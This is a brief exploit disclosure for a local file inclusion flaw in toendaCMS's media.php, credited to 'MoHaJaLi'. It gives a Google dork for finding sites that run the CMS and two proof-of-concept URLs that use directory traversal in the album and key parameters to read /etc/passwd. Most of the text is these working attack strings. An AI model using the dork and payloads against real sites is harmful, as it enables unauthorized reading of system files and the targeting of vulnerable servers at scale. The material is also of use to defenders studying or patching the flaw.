toendaCMS suffers from a local file inclusion vulnerability.
71fb4a31475c2f9320336ac582e8548f
Local File Include in toendaCMS.
Vulnerable File : media.php
googleDork: "Powered by toendaCMS "
PoC:
http://site.com/media.php?album=1005bb&key=../../../../../../../../../../../../../etc/passwd
or
http://site.com/ media.php?album=../../../../../../../../../../../../..&key=/etc/passwd
_____
Found By MoHaJaLi
Greetz to Eddy_BAck0o
_____
Comments
No comments yet, be the first!